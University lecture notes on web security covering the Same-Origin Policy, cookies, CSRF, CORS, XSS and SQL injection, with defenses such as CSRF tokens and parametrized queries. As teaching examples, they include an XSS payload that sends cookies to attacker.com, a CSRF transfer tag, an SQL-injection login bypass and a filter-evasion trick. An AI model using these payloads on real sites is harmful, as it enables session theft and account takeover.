
An overview of Web Security principles

This class is a gentle introduction to key principles of Web security: browser security, server-side security, known problems and attacks to watch out for when designing Web apps, known defenses, and finally the notion of privacy from the user’s perspective.

Ethical behavior and Law

Compared to the buffer overflow exploitation discussed and experimented with in previous lectures, the vulnerabilities we cover in this class are still everywhere on the Web and are exploitable. If you experiment with security problems in the real world, first of all:

  • You are responsible for your own actions.
  • You can always come discuss with me if you have any doubts or questions.
  • Never cause harm.

Belgium has legalized ethical hacking since February 15, 2023, and any ethical hacker must follow the CCB’s guidelines. Any Belgian may now investigate cybersecurity problems without the product owner’s consent, but what distinguishes a criminal from a white hat is adherence to the following rules:

  • Never cause harm or (try to) obtain illegitimate benefits.
  • Report any vulnerability as soon as possible to the CCB (Centre for Cybersecurity Belgium). You must also report any finding to the product owner.
  • Be proportionate and limit yourself to what is necessary to demonstrate the issue.
  • Do not disclose to a broader public without consent of the CCB.

Be aware that there are deadlines to respect, and you’ll be protected only if you carefully follow the CCB rules. Some cases may still impose a restrictive process to follow. You must be completely aware of the process before tinkering with anything online without explicit consent. More information may be found on the CCB website.

The (tangled) Web

The Web is a soup of various technologies linked together by backward-compatible standardized protocols, which leaves little room for security by design. Web security is an example of what we could call best-effort security: security was not part of the initial design considerations and was added as an afterthought, while trying at the same time not to break the very features that caused the security problems.

The Web has evolved considerably since the late 1980s. Originally, it consisted of static pages with links, and a few commands to retrieve, modify, or add data on servers. Then the protocols and usage grew in complexity, notably with the introduction of JavaScript. Is that a problem? Well, our browser now follows instructions sent by an attacker. Do you trust the sites that you visit? No? Yet your computer executes the JavaScript they send and follows the links an attacker provides and that you might click on. The situation is even worse. A malicious site may make your machine do the following:

  • Spawn processes
  • Open sockets to another remote peer
  • Download content from other third-parties
  • Run media
  • Run code on your GPU
  • Interact with your filesystem

All of these operations can happen without you even noticing. Michal Zalewski, in his book “The Tangled Web” on Web security, says the following:

Modern Web applications are built on a tangle of technologies that have been developed over time and then haphazardly pieced together. Every piece of the web application stack, from HTTP requests to browser-side scripts, comes with important yet subtle security consequences. To keep users safe, it is essential for developers to confidently navigate this landscape.

Indeed, as in many areas of computer security, what matters most for a security expert is to understand the underlying system in deep detail, and to understand its limitations. It is through abuse of a system’s limitations that security problems find their way in. So, to understand the main problems with Web security, we first need to review a few core Web concepts.

URLs

URL stands for Uniform Resource Locator; it says how and where to locate some content. The how part refers to the protocol to use. URLs on the Web usually have either http or https as the protocol identifier, but URLs can use other protocols too. You may have already seen git+ssh://, which indicates that the git protocol runs over an SSH channel. ftp:// was also a well-known and widely used protocol years ago; however, it is being phased out, and file transfer is now mostly performed over http as well.

We have three mandatory parts in the URL:

https://www.example.com/index.html
  1. protocol: https
  2. location: www.example.com
  3. the path: /index.html

On the Web, the location uses domain names, and the DNS protocol converts the human-readable location into an Internet location (an IP address). The path is the location of the content on the Web server, where / refers to the root of the content the server exposes.

The URL can be more complex, but always involves these three components. For example, we may have:

https://www.example.com:8443/path/to/file.html?user=Bob#s5

that involves an explicit port (8443); otherwise 443 is the default with https. The URL also contains a query (?user=Bob), which is part of the HTTP protocol, and an anchor (#s5) that tells the browser to jump to a particular tag of the page. While the query is sent to the remote server, the anchor is local information telling the browser where to jump.
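For illustration, Python’s standard urllib.parse decomposes this exact URL into the pieces listed above:

```python
from urllib.parse import urlparse

url = "https://www.example.com:8443/path/to/file.html?user=Bob#s5"
parts = urlparse(url)

print(parts.scheme)    # protocol: "https"
print(parts.hostname)  # location: "www.example.com"
print(parts.port)      # explicit port: 8443
print(parts.path)      # "/path/to/file.html"
print(parts.query)     # sent to the server: "user=Bob"
print(parts.fragment)  # kept local by the browser: "s5"
```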

A web page may also contain URLs that are relative or absolute with regard to the main URL that was fetched.

<a href='/path/to/otherfile.html'> otherfile </a>

An advantage of writing your website with relative URLs is that your content is not bound to your domain name: the same pages work on localhost or on your public domain without requiring a different configuration.
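The browser resolves such relative URLs against the page’s own URL; urllib.parse.urljoin mimics that resolution (the localhost port 8080 below is an arbitrary example):

```python
from urllib.parse import urljoin

page = "https://www.example.com/index.html"
# A root-relative href is resolved against the page's origin:
print(urljoin(page, "/path/to/otherfile.html"))
# -> https://www.example.com/path/to/otherfile.html

# The same markup served from localhost resolves locally instead:
print(urljoin("http://localhost:8080/index.html", "/path/to/otherfile.html"))
# -> http://localhost:8080/path/to/otherfile.html
```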

HTML / Javascript / CSS

A web page may contain different types of elements that may also interact. HTML (Hypertext Markup Language) is not a programming language, but a specific way to structure the Web page and support basic interactions with the users. For example:

  • Any webpage may embed links to other elements of its own web content, or to arbitrary content on the Web.

    <!-- Brings the user to Facebook -->
    <a href="https://facebook.com"> Click here </a> 
    
  • Embed a picture in the webpage:

    <img src="https://example.com/picture.png" />
    

    You may as well attach javascript to images. For example:

    <img src="https://example.com/picture.png" onError="doThis()"/>
    
  • Include javascript in a page:

    <!-- External inclusion -->
    <script src="path/to/script.js"> </script>
    
    <!-- Inline inclusion -->
    <script>
      let cookie = document.cookie;
    </script>
    

    The main goal of JavaScript is to defer part of the work to the client, for example computation on data. The server does not have to do the computation; instead it sends the data alongside the instructions (the JavaScript). JavaScript is also useful to make pages that change client-side, i.e., dynamic pages. JavaScript can read, process, and create any part of the DOM (Document Object Model), send HTTP queries, retrieve or change the browser’s local state, and interact with the user through prompts.

  • Include CSS in a page:

     <div>
        ...
     </div>
      /* We can hide content in various ways, e.g.: */
      div {
        display: none;
      }
    
      /* Or this: */
    
      div {
        width: 0px;
        height: 0px;
        overflow: hidden;
      }
    
  • Webpage inclusion into a webpage:

     <iframe src="https://another.website"></iframe>
    

    which of course would cause a severe security risk if the embedded webpage were able to navigate or change its surrounding one.

HTTP

HTTP is the underlying Web protocol linking client side to server side through URLs. Today, three versions of HTTP are actively used: HTTP/1.1 (RFC 2616), HTTP/2 (RFC 9113) and HTTP/3 (RFC 9114). There are many differences, mostly involving performance considerations. For this class, we won’t cover the specifics of each version.

HTTP can be abstracted as a fairly simple stateless request-response protocol: clients (browsers, CLI tools such as curl) open a connection to an HTTP server listening for HTTP queries, and can request content or remotely change content on the server (given permission). For each request made, the server generates and sends a response including a series of headers, a response code, and the body of the requested content, if any.

For example, to request some content, we can send an HTTP GET request. It may look like this:

Request URL: https://example.com
Request Method: GET
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Referrer Policy: strict-origin-when-cross-origin

In practice, all this information is encoded in a specific way within an HTTP request header and sent to the server. The RFC explains how to encode it (you don’t need to understand these details; only that they exist). What is put into the request headers is fully under the control of the client. The client can include many key/value pairs, which the server may simply ignore.

The response header may look like this:

HTTP/1.1 200 OK
content-encoding: gzip
content-length: 648
content-type: text/html
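To make the header structure concrete, here is a small illustrative parser for such a raw response head (a real client would rely on an HTTP library rather than this sketch):

```python
raw = (
    "HTTP/1.1 200 OK\r\n"
    "content-encoding: gzip\r\n"
    "content-length: 648\r\n"
    "content-type: text/html\r\n"
    "\r\n"
)

def parse_head(head: str):
    """Split a raw response head into a status code and a header map."""
    status_line, *header_lines = head.strip().split("\r\n")
    version, code, reason = status_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return int(code), headers

code, headers = parse_head(raw)
print(code, headers["content-type"])  # 200 text/html
```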

There are several HTTP request types: GET, POST, HEAD, OPTIONS, PUT, DELETE, TRACE, and CONNECT are the best-known HTTP methods, although some of them are often not supported. Extensions (new request types) may exist for specific applications that control both the client and server implementations and require other features.

GET and POST are however the most used methods. We focus on them:

GET: It is mainly used for information retrieval, and should not carry a payload sent by the client. A GET request should not be used to change the server’s state, or to communicate security parameters to the server.

POST: It is mainly used to submit information to the server, change its state, or communicate security parameters. A POST request is like a GET request, but with a body attached next to the request header. POST requests may also be used to retrieve content at the same time.

The difficulty of securing users’ navigation

We consider the situation where users may visit malicious websites that want to abuse their information on other websites. For example, eve.com, when loaded in the browser, would like to know things about the user’s emails on Gmail. Since the client runs JavaScript, eve.com could send a script that loads and hides Gmail within its own website, and then explores and retrieves anything within the user’s emails.

eve.com could also use a script to try to connect to the user’s social media accounts and spread dangerous content. Essentially, eve.com wants to access the user’s data or environment on any other website, and we need the browser to be able to deal with these issues.

But how do we differentiate a malicious access from eve.com to a third party from a legitimate access to a third party? We can’t. Either we allow websites to interact transparently (which would be extremely unsafe for everyone), or we explicitly disallow it (with a few exceptions, heh!) to draw a line, but at the cost of a significant reduction in Web capabilities.

To deal with all the problems that may arise from so much flexibility in how the Web combines various sources and content, browsers apply a concept called the Same-Origin Policy (SOP). This concept alone thwarts most of the issues in the current Web threat model, in which visited services are threats to other services and to the user across services.

Same Origin Policy

The Same-Origin Policy is an architectural choice decided and imposed by all browser vendors on Web pages. It is a bit similar in its core principle to the Rust ownership model that we discussed in class 03. In a sense, the Same-Origin Policy imposes limitations on what a Web developer can do. These limitations are carefully designed to prevent the obvious security problems while not impacting too much what a legitimate and honest Web developer can and cannot do.

The Same-Origin Policy introduces the notion of an origin for a Web page and for Web elements. The origin is the location a Web element was provided from, and interacting elements in a Web page must have the same origin (otherwise they simply can’t interact).

The origin is parsed from the URL from which the Web element was fetched. It comprises three elements: protocol, domain, and port. E.g.:

https://example.com

has the origin protocol=https, domain = example.com, port = 443. The following URL has the same origin:

https://example.com/get/content

This one is a different origin:

https://www.example.com/get/content

This is due to the use of the www subdomain, even though both domains may be under the control of the same entity. You may read more details on the origin-determination rules here.
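The origin-determination rule can be sketched as a (protocol, domain, port) triple, with the default port filled in from the protocol; this is a simplified model of what browsers actually do:

```python
from urllib.parse import urlparse

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url: str):
    """Return the (protocol, domain, port) triple used by the SOP."""
    p = urlparse(url)
    port = p.port or DEFAULT_PORTS.get(p.scheme)
    return (p.scheme, p.hostname, port)

# Same origin: only the path differs.
assert origin("https://example.com") == origin("https://example.com/get/content")
# Different origin: the www subdomain changes the domain component.
assert origin("https://example.com") != origin("https://www.example.com/get/content")
```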

Each resource of a page is labelled with an origin, and as the name indicates, only resources with the same origin may interact. There are, however, a few exceptions:

The browser knows which page and JavaScript code has been pulled from a given origin, and attaches the origin of the page to the code’s execution context. So, for example, the following JavaScript code within the HTML page of https://unamur.be:

<script src="https://static.addtoany.com/menu/modules/core.gfvbdf8m.js" type="module"></script>

has the origin of https://unamur.be. If the script is malicious, it can essentially do anything it wants within the context of unamur.be. It is a bit like including a third-party crate in your Rust program: if the third-party crate is untrustworthy, your program may become malicious or exploitable due to a vulnerability in the dependency. In the case of Rust, the tool cargo audit is designed to audit dependencies. Similar tools exist in the Web context to audit third-party scripts, which are usually included as libraries. It is, however, less simple, essentially because dependencies on the Web are unstructured.

Note that the inclusion of third-party content may also create fundamental privacy issues for the user. Let’s reverse roles and now assume the user, Alice, is loading https://unamur.be, which can include any script making a request to a third-party site. The hidden, adversarial goal of unamur.be would be to learn some information about Alice; for example, is Alice currently logged in to ChatGPT? Maybe Alice does not want her university to know this, and she has every right to hide it. The problem is: while https://unamur.be cannot access any content retrieved from a different origin (chatgpt.com in this case), it can still learn some information from side channels, e.g., status codes or request timings. Assume a sysadmin behind https://unamur.be has found a way to make any logged-in user trigger an error on chatgpt.com. The page result could be as follows:

The content of that page is technically not visible to https://unamur.be; however, its status is! The page could return an HTTP error code if, say, a user is logged in, and no error code otherwise. If such a page exists, we have found a distinguisher on ChatGPT’s website that can be exploited in a few lines included from any other origin, in this example from https://unamur.be:

<script type="text/javascript"
 src="https://chatgpt.com/path_to_my_distinguisher"
 onload="not_logged_in_to_chatgpt()"
 onerror="logged_in_to_chatgpt()"
 defer>
 </script>

That is, depending on the status code of the request made to the ChatGPT URL, the onload or onerror event triggers, and we learn what we wanted. We could report the problem to ChatGPT; but the status code is not the only way to figure out whether Alice is connected, and ultimately the only sound solution that prevents acquiring such knowledge with guarantees is … to prevent cross-origin scripts, which would break the entire Web, since most websites use them. Here we have a prime example of the tension between privacy and security requirements and the usability of a given technology.

So, in summary, webpages from a given origin can link to other webpages or direct a form to another origin. JavaScript may click the link for the user or submit the form, although what JavaScript can do depends on its origin.

These rules impose some limitations but are also open enough to support many cross-site features, and, because of that openness, potential vulnerabilities to be cautious with. Regarding limitations, Ajax requests (XMLHttpRequest()) cannot reach an origin other than the one they’re attached to. Otherwise, unamur.be could read your emails, post to your social media accounts, and whatever else without any user interaction, which would be terrifying. The SOP thus expresses enough flexibility to enable many use cases while trying to provide some level of isolation and permission between interacting Web contents.

Img tags <img src="..." />

Images have the origin of the URL they come from. If one includes <img src="https://othersite.com/img.png"/> on https://unamur.be, then the page with origin https://unamur.be (i.e., its code) would not be able to access the content of img.png, or even retrieve it and send it to a server.

However, again, we can get side-channel information, for example the impact the image has on the DOM’s size, which could help learn its dimensions. This, too, can help guess whether or not a user is connected to another website. These kinds of privacy leaks were reported around 15 years ago, and there is still no complete solution.

Iframes tags <iframe src="..."></iframe>

Iframes, like images, have the origin of the URL they come from. So they can come from anywhere and be embedded into eve.com’s website, but the iframe and eve.com cannot interact (e.g., eve.com cannot use JavaScript to interact with the iframe’s content).

Despite the Same-Origin policy in web browsers, there are still potential attacks that web developers must be aware of. But before diving into them, we need an overview of Browser and HTTP cookies.

Cookies

We said HTTP was a stateless protocol, but we sometimes need browsers to remember information that the server sends us. Cookies are designed for this: they let the server set a state in the visitor’s browser to facilitate further interactions. Shopping carts that persist across pages on e-commerce sites? Cookies. Tracking your behavior for advertising? Cookies. Authorizing access to certain pages without requiring the user to input their credentials each time? Cookies.

The way websites can tell the browser to set a cookie is through the HTTP header response. For example:

Set-Cookie: key=value

creates a key/value pair linked to the Origin from which the header was sent. Each time a browser then sends an HTTP request (GET, POST, etc), it automatically attaches any cookie linked to the Origin, into the HTTP request header.

Cookies can be secret values too, typically for pages protected by authentication. Upon successful authentication, a server would send back in its response header:

Set-Cookie: session=SESSIONID

SESSIONID is expected to be a unique, hard-to-guess value that is valid for the current session (see class 04 on producing values that are hard to guess); that is, it changes at each authentication. Such a cookie must of course only be sent to the correct origin, and through a secure channel (HTTPS).
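For illustration, Python’s secrets module produces values of exactly this kind; the 32-byte length below is an arbitrary but common choice, not a prescribed standard:

```python
import secrets

# 32 random bytes (~256 bits of entropy), URL-safe base64-encoded.
session_id = secrets.token_urlsafe(32)
print(f"Set-Cookie: session={session_id}")

# Two independently generated IDs should never collide in practice.
assert session_id != secrets.token_urlsafe(32)
```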

Cross-Site Request Forgery (CSRF)

Sadly, the exceptions in the Same-Origin Policy and the way cookies work can allow malicious websites such as eve.com to do terrible things. Several conditions and bad practices need to come together for this to happen. For example, eve.com could have the following in its webpage:

<img src="https://belgiumbank.be/transfer?amount=42&to=eve" />

The browser, upon seeing the img tag, would try to resolve it and fetch the indicated link, setting the GET request header with the indicated parameters. The browser would also attach and send any cookie linked to belgiumbank.be. So, if you happen to be logged in to belgiumbank, your session cookie would be sent, and the transfer might then succeed.

Of course, this is bad practice from the bank. We said that the GET method should not be used to modify the server’s state. But would it have changed anything if the transfer interface were only accessible through a POST request? Of course not; the only difference is that eve.com would have to embed a form, hide it on the webpage, and submit it automatically using JavaScript. It is a bit more work, but should be considered trivial.

So what can we do?

Good Practice: CSRF tokens

The fundamental problem is that belgiumbank.be cannot differentiate a request made from its own page from one made by any other client that knows how to reach belgiumbank.be. And belgiumbank.be’s API (e.g., the transfer API) should be considered public knowledge: the security of the bank must not depend on whether or not its endpoints are known. Hiding or obfuscating the API is a classic beginner mistake in Web design.

The right approach is to exploit the browsers’ Same-Origin Policy to ensure that any request received on a given URL is only possible because we ourselves generated that URL for a given legitimate client. eve.com is not a legitimate client; it merely tries to look like one in the victim’s context.

How can we generate unique URLs? We can add a parameter to the API, and this parameter should be unique and fresh each time a given SESSIONID receives a webpage. belgiumbank.be would remember in its database each token generated for a given SESSIONID and requested endpoint. Eventually, when belgiumbank receives a request, the request contains the CSRF token, e.g.:

POST /transfer
amount=42
sessionid=...
token=ayuzejklqhsfdsqfa232j12121KDSSkkj812S

We can generate the token using a PRG, store it in the database associated with the user that made the initial page request, and finally compare the token we receive to the stored token. It is also possible to generate it cryptographically from a user-dependent secret attached to the origin (but not stored in cookies) and a server-side key. The main advantage is that storing the token becomes unnecessary, since it can be deterministically re-generated from the secrets; but this may make the implementation more complex due to the added cryptographic generation and verification algorithms. From the basic cryptography we covered in class 04 (e.g., a cryptographic hash function), you should be able to devise such generation and verification algorithms yourself.
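As a sketch of the cryptographic variant (the names, key handling, and token layout here are illustrative assumptions, not a prescribed scheme), an HMAC keyed by a server-side secret can bind a token to a session and an endpoint without storing anything:

```python
import hmac
import hashlib

SERVER_KEY = b"server-side secret key"  # illustrative; keep out of source control

def make_csrf_token(session_id: str, endpoint: str) -> str:
    """Derive a token bound to one session and one endpoint."""
    msg = f"{session_id}|{endpoint}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def verify_csrf_token(session_id: str, endpoint: str, token: str) -> bool:
    # Recompute and compare in constant time: no token storage needed.
    return hmac.compare_digest(make_csrf_token(session_id, endpoint), token)

token = make_csrf_token("SESSIONID", "/transfer")
assert verify_csrf_token("SESSIONID", "/transfer", token)
assert not verify_csrf_token("SESSIONID", "/other", token)        # wrong endpoint
assert not verify_csrf_token("OTHERSESSION", "/transfer", token)  # wrong session
```

Note that as written the token is not fresh per request; a real design would also mix in a timestamp or nonce so tokens expire, as discussed below.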

Note that these tokens are usually designed to be limited in number and to time out (or one could fill the server’s memory) when they are stored. This can be more subtle to get right than the cryptographic approach. Whatever the approach, a token must be hard to guess, and unique for each endpoint requested, each time it is requested with a given sessionid. As we discussed in the cryptography class, this means the token must appear to be selected uniformly at random from a large space.

The security assumption behind this design is that eve.com has no way to steal a user’s CSRF token and include it in its own request. This holds as long as the browser’s SOP isolation works.

Configurable Exception to SOP: Cross Origin Resource Sharing (CORS)

We said Ajax requests could not cross origins. However, a domain aa.com can tell the browser that XMLHttpRequest() calls may be sent from a domain bb.com, allowing cross-origin requests from bb.com.

aa.com can give this information to the browser using the HTTP header, setting Access-Control-Allow-Origin: bb.com. You’ll find more details on Mozilla’s website.

Code Injection attacks (Server-side security)

Cross-site Scripting (XSS) attacks

Assume we’re visiting an honest website. The attacker could be another client of the website who wants to access other clients’ secrets, such as their session cookie. If the website takes client input and later displays it, it must be careful not to include any JavaScript code sent by a malicious client. Such JavaScript would run within the origin of the honest website and could access that website’s entire context in the victim’s browser, including, for example, their session cookie.

Imagine the following page index.php on honest.com sending the following HTTP response to the request GET /index.php?name=Bob:

...

<p>Welcome back <?php echo $_GET['name']; ?> </p>

...

This code is vulnerable to a reflected XSS, where someone injects a script into the GET parameter and gets someone else to run it. Note that URLs sent over the Internet may only contain the ASCII character set, so any character not part of this set, and characters with special meaning (e.g., a / or a <), have to be encoded as ASCII characters: % followed by two hexadecimal digits. %20 is the space character; %2F is the / character. Look at the following URL exploiting the vulnerable PHP code above:

https://honest.com/index.php?name=Bob%3Cscript%3E%0A(new%20Image()).src%20%3D%20%22http%3A%2F%2Fattacker.com%2F%3Fx%3D%22%20%2B%20encodeURIComponent(document.cookie)%3B%0A%3C%2Fscript%3E

This request would give the following page to anyone clicking the link:

...
<p> Welcome back Bob<script>
(new Image()).src = "http://attacker.com/?x=" +
encodeURIComponent(document.cookie);
</script></p>
...

Check the mapping between %+2digits with the displayed character.
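You can check that mapping directly: urllib.parse.unquote performs exactly this percent-decoding.

```python
from urllib.parse import unquote

# Each %XX escape maps to the character with hexadecimal code XX:
assert unquote("%20") == " "
assert unquote("%2F") == "/"
assert unquote("%3Cscript%3E%0A") == "<script>\n"

# Decoding a percent-encoded payload recovers the injected markup:
print(unquote("Bob%3Cscript%3E"))  # Bob<script>
```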

This sends the victim’s cookie to attacker.com, using the SOP exception on image inclusion. It is a form of code injection vulnerability. The same kind of XSS attack can also be called “stored” rather than reflected: the malicious input is stored in the website’s database and then served to other clients on demand. Forums used to be the main example of such stored XSS attacks. That is, assume there exists a place where you can write a message that is later displayed to other people: if the server lets you input JavaScript and does not check for it, the script may be executed for anyone visiting your post.

Remember: these problems are real and plague the Web. Never cause harm; never take advantage of them in the real world, even just for fun.

SQL Injections

Server-side code usually uses SQL databases to store and retrieve content efficiently. SQL is a domain-specific language (DSL) that requires careful handling of any input provided by the client, since client input is untrusted in the Web’s threat model.

SQL code and interactions with the database usually follow from an HTTP request sent by the client. The HTTP request may contain parameters used in the SQL query. Let’s take an example with an authentication form.

A user fills a form and clicks the submit button to authenticate, which triggers the browser to send an HTTP POST request:

POST /auth HTTP/1.1

email=bob@bobemail.com&password=BobPa$$word

Server side, the database may have a users table which looks like the following:

| Email            | hashed_pwd          |
|------------------|---------------------|
| bob@bobemail.com | AKjd54zsd…1azezer   |
| alice@skynet.com | skdsqj46aa..Z5554aa |

The server may start by hashing the provided password, and then issue the following query:

SELECT 1 FROM users WHERE email = '{email}' AND hashed_pwd = '{hpwd}' LIMIT 1;

This is vulnerable to an SQL injection, where the user could input the following value in the authentication form’s email field (pay attention to the quotes):

alice@skynet.com' OR '1' ='1

which would result in the following SQL query:

SELECT 1 FROM users WHERE email = 'alice@skynet.com' OR '1' = '1' AND hashed_pwd = '{hpwd}' LIMIT 1;

This query returns a row whenever the provided email exists in the database: because AND binds tighter than OR, the condition is read as email = '...' OR ('1' = '1' AND hashed_pwd = ...), so the first clause alone matches regardless of the password, allowing the attacker to potentially authenticate to any account. Note that this is one injection example among many; the possibilities depend on the kind of SQL query written by the server.
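The bypass can be reproduced with an in-memory SQLite database; the schema and values mirror the table above, and the query is deliberately built with unsafe string interpolation (the password hash is deliberately wrong):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (email TEXT, hashed_pwd TEXT)")
db.execute("INSERT INTO users VALUES ('alice@skynet.com', 'skdsqj46aa..Z5554aa')")

email = "alice@skynet.com' OR '1' ='1"   # attacker-controlled input
hpwd = "hash-of-a-wrong-password"

# Unsafe: the quote inside `email` escapes the SQL string literal.
query = f"SELECT 1 FROM users WHERE email = '{email}' AND hashed_pwd = '{hpwd}' LIMIT 1;"
row = db.execute(query).fetchone()
assert row == (1,)   # authentication bypassed despite the wrong password
```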

Sanitizing inputs

Any input received from a client is untrusted. The server must always sanitize its inputs, and sanitizing inputs is not trivial. For example, if the server parses inputs to filter out <script> tags, the user could adapt the XSS attack example as follows:

<scr<script>ipt> ... </sc</script>ript>

which, after a single pass of tag removal, results in <script> ... </script>.
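A quick sketch (in Python, for illustration) of why such a single-pass filter fails:

```python
def naive_sanitize(text: str) -> str:
    # Single-pass removal of the forbidden tags: NOT a real defense.
    return text.replace("<script>", "").replace("</script>", "")

payload = "<scr<script>ipt> alert(1) </sc</script>ript>"
print(naive_sanitize(payload))  # <script> alert(1) </script>
```

Removing the inner tags glues the surrounding fragments back into exactly the tags the filter was meant to eliminate.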

Regarding SQL statements, the problem is generally well handled using parametrized queries (also called prepared statements) from existing Web frameworks. You should not attempt sanitization yourself; rather, use the existing tooling to escape quotes and to check that the input matches the expected type (e.g., an email address, or a date). You’ll find more examples in the reading materials for this class.

Note that, for SQL injections, parametrized queries are the right way to go. The idea of that approach is to have the SQL engine compile (prepare) the query before receiving the user input, so that the user input cannot modify the query’s structure. Every serious SQL library supports parametrized queries.
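With Python’s standard sqlite3 module, for instance, the same malicious email from the injection example no longer matches anything once it is passed through `?` placeholders (table layout as in the example above):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (email TEXT, hashed_pwd TEXT)")
db.execute("INSERT INTO users VALUES ('alice@skynet.com', 'skdsqj46aa..Z5554aa')")

email = "alice@skynet.com' OR '1' ='1"   # same attacker input as before
hpwd = "hash-of-a-wrong-password"

# The `?` placeholders are filled by the driver after the query is prepared:
row = db.execute(
    "SELECT 1 FROM users WHERE email = ? AND hashed_pwd = ? LIMIT 1;",
    (email, hpwd),
).fetchone()
assert row is None   # the quote is treated as data, not as SQL
```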